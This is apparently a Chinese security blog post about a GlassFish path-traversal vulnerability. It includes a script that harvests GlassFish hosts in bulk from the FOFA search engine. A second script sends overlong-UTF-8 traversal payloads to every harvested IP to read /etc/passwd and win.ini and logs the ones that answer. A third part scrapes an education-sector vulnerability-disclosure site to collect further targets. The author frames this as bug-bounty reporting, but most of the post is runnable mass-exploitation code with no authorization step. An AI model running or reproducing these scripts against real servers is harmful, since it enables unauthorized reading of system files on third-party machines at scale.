0x00 glassfish漏洞描述
漏洞分析:
glassfish是一款java编写的跨平台的开源的应用服务器。
与宽字节SQL注入一致,都是由于unicode编码歧义导致的。具体payload如下构造:
0x01 fofa批量爬取目标IP
-*- codeing = utf-8 -*-
@Time : 2021/10/17 16:19
@Author : Hsy
@File : fofa-glassfish.paqu.py
@Software: PyCharm
import requests
import base64
from lxml import etree
import time
search_data='"glassfish" && port="4848"'
headers={
'cookie':'你的cookie',
}
for yeshu in range(1,6):
url='https://fofa.so/result?page='+str(yeshu)+'&qbase64='
search_data_bs=str(base64.b64encode(search_data.encode("utf-8")),"utf-8")
urls=url+search_data_bs
print(urls)
try:
print('正在提取第'+str(yeshu)+'页')
result=requests.get(urls,headers=headers).content
soup=etree.HTML(result)
ip_data=soup.xpath('//span[@class="aSpan"]/a[@target="_blank"]/@href')
ipdata='\n'.join(ip_data)
print(ip_data)
with open(r'ip.txt','a+') as f:
f.write(ipdata+'\n')
f.close()
time.sleep(0.5)
except Exception as e:
pass
结果:
0x02 批量验证漏洞
# -*- codeing = utf-8 -*-
# @Time : 2021/10/17 17:14
# @Author : Hsy
# @File : yanzhen-glassfish-poc.py
# @Software: PyCharm
import requests
import base64
from lxml import etree
import time
import sys
payload_linux='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
payload_windows='/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
for ip in open('ip.txt'):
ip=ip.replace('\n','')
windows_url=ip+payload_windows
linxu_url=ip+payload_linux
try:
vuln_code_l=requests.get(linxu_url).status_code
vuln_code_w=requests.get(windows_url).status_code
print("check->"+ip)
if vuln_code_l==200 or vuln_code_w ==200:
with open(r'vuln.txt','a+') as f:
f.write(ip)
f.close()
time.sleep(0.5)
except Exception as e:
pass
漏洞验证:
下一步批量提交公益src!!!
0x02 爬取edu漏洞公告:
批量爬取漏洞公告,为后续挖掘src做准备!
爬取代码1:
import requests,time
from lxml import etree
def edu_list(page):
for page in range(1,page+1):
try:
url='https://src.sjtu.edu.cn/list/?page='+str(page)
data=requests.get(url).content
#print(data)
soup = etree.HTML(data.decode('utf-8'))
result = soup.xpath('//td[@class=""]/a/text()')
#print(result)
results = '\n'.join(result)
resultss=results.split()
print(resultss)
for edu in resultss:
with open(r'src.txt', 'a+',encoding='utf-8') as f:
f.write(edu+'\n')
f.close()
except Exception as e:
time.sleep(0.5)
pass
if __name__ == '__main__':
edu_list(10)
爬取代码2:
import requests
from lxml import etree
#yeshu=input("您要爬取多少页数:")
def src_tiqu(yeshu):
for i in range(1,int(yeshu)):
url='https://src.sjtu.edu.cn/list/?page='+str(i)
print('提取->',str(i)+'页数')
data=requests.get(url).content
print(data.decode('utf-8'))
soup = etree.HTML(data)
result=soup.xpath('//td[@class=""]/a/text()')
results = '\n'.join(result)
resultss = results.split()
for edu in resultss:
print(edu)
with open(r'src_edu.txt', 'a+', encoding='utf-8') as f:
f.write(edu + '\n')
f.close()
if __name__ == '__main__':
yeshu = input("您要爬取多少页数:")
src_tiqu(yeshu)
总结完毕,创作不易,有什么问题希望指点出来,希望师傅可以点赞!
交流学习:
博客:www.kxsy.work
SND社区:告白热